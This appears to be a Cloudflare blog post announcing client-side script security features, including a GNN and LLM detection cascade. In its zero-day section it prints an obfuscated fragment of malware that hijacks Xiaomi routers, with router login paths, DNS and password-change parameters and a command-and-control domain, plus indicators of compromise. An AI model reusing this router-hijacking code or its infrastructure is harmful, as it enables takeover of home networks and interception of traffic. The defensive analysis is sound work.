Client-side skimming: The attack that breaks nothing
Client-side skimming attacks have a unique advantage: they can steal data without disrupting anything. The page loads normally. Checkout completes without error. All it takes is a single malicious script tag injected into the page.
Recent incidents show how real this threat is:
- In January 2026, Sansec reported a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.
- In September 2025, attackers published malicious releases of widely used npm packages. If bundled into front-end code, end users could be exposed to crypto-stealing in the browser.
Cloudflare is responding with two changes. First, Client-Side Security Advanced (formerly the Page Shield add-on) is now available to self-serve customers. Second, domain-based threat intelligence is now free for all customers on the Client-Side Security bundle.
How detection works at scale
Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting an average of 2,200 scripts per enterprise zone. It collects signals using browser reporting — for example, Content Security Policy — so no scanners or app instrumentation are required, and there is zero latency impact. The only prerequisite is that traffic is proxied through Cloudflare.
Client-Side Security Advanced offers:
- Smarter malicious script detection: In-house machine learning, now enhanced with assessments from a Large Language Model (LLM).
- Code change monitoring: Continuous detection and monitoring for compliance with requirements like PCI DSS v4, requirement 11.6.1.
- Proactive blocking rules: Positive content security rules that are maintained and enforced through continuous monitoring.
Managing client-side security is a data problem. An average enterprise zone observes roughly 2,200 unique scripts; smaller business zones often handle around 1,000. About a third of these scripts undergo code updates within any 30-day window. Manually approving every new DOM interaction or outbound connection would paralyze development.
The detection strategy focuses on what a script is trying to do. Using an Abstract Syntax Tree (AST), the system analyzes script behavior, identifying patterns that signal malicious intent regardless of obfuscation.
The false positive problem
Client-side security differs from active vulnerability scanning. A WAF constantly blocks high-volume automated attacks, but a client-side compromise — such as a breach of an origin server or a third-party vendor — is a rare, high-impact event. Rarity creates a challenge: because real attacks are infrequent, detections are statistically more likely to be false positives. For security teams, false alarms create fatigue and hide real threats.
A two-stage detection pipeline
The frontline detection engine is a Graph Neural Network (GNN) that operates on the AST of JavaScript code. It learns structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. The GNN is tuned for high recall to catch novel, zero-day threats.
Its precision is already high: less than 0.3% of total analyzed traffic is flagged as a false positive. But at Cloudflare's scale of 3.5 billion scripts assessed daily, even a sub-0.3% FP rate creates a disruptive volume of false alarms.
The core issue is class imbalance. The diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but legitimate scripts — bot challenges, tracking pixels, ad-tech bundles, minified frameworks — can overlap structurally with malicious code in the GNN's learned feature space.
This is where LLMs complement the GNN. LLMs understand real-world JavaScript practices: domain-specific idioms, common framework patterns, and the difference between sketchy-but-innocuous obfuscation and genuinely malicious intent. Instead of replacing the GNN, Cloudflare designed a cascading classifier:
- Every script is first evaluated by the GNN. If predicted benign, the pipeline terminates immediately — minimal latency for the vast majority of traffic, bypassing the heavier LLM computation.
- If the GNN flags the script as potentially malicious, it is forwarded to an open-source LLM hosted on Cloudflare Workers AI for a second opinion.
- The LLM, with a security-specialized prompt context, semantically evaluates the script's intent. If it determines the script is benign, it overrides the GNN's verdict.

Results from internal evaluations on production traffic are significant. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation reduced false positives by nearly 3x: dropping the ~0.3% FP rate to ~0.1%. For unique scripts, the impact is even more dramatic: the FP rate drops from ~1.39% to just 0.007% — roughly a 200x reduction.
At Cloudflare's scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms every day. As a safety net, every script flagged by the GNN is logged to R2 for posterior analysis, allowing continuous auditing of LLM overrides and catching edge cases where a true attack might be filtered out.
Because the LLM acts as a reliable precision filter, the GNN's decision threshold can be lowered, making it even more aggressive. This catches novel, highly obfuscated true attacks that previously fell below the detection boundary — without overwhelming customers with false alarms.
Zero-day in the wild: The core.js router exploit
The two-stage architecture has already proven itself. The detection pipeline recently flagged a novel, highly obfuscated malicious script (core.js) targeting users in specific regions.
The payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like wanType=dhcp, wanType=static, and wanType=pppoe), overwrites DNS settings to hijack traffic through Chinese public DNS servers, and attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it was injected into users' sessions via compromised browser extensions.
To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that VirusTotal had not yet reported detections at the time of writing.
The GNN revealed the underlying malicious structure despite the obfuscation, and the Workers AI LLM confidently confirmed the intent.
const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&asyn=0&auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&autoset=1&dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));
This is the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but structural and semantic AI approaches catch.
Indicators of Compromise (IOCs)
- URL: hxxps://ns[.]qpft5[.]com/ads/core[.]js
- SHA-256: 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202
- C2 Domain: hxxps://api[.]qpft5[.]com
Threat intelligence for every tier
Domain-based threat intelligence is now available to all Cloudflare Client-Side Security customers, not just those on the Advanced plan. The move follows a 2025 trend where non-enterprise sites—especially Magento-based webshops—fell victim to client-side attacks that lingered for weeks after disclosure. Smaller operators often lack the dedicated security staff needed to keep pace.
With this update, any site owner can see a direct warning when a script or connection on their page points to a known malicious domain. That signal lets them respond quickly: clean the page and investigate whether the origin itself was compromised. To get started, enable Client-Side Security in the dashboard, and Cloudflare will flag any JavaScript or network activity tied to those domains.
Advanced plan for PCI DSS v4 compliance
For those running e-commerce operations, Client-Side Security Advanced covers the PCI DSS v4 requirements (specifically 6.4.3 and 11.6.1). Before you commit, Cloudflare will provide a cost estimate based on your HTTP request volume from the previous month, so there are no surprises. Pricing details and sign-up are available on the plans page and in the dashboard.



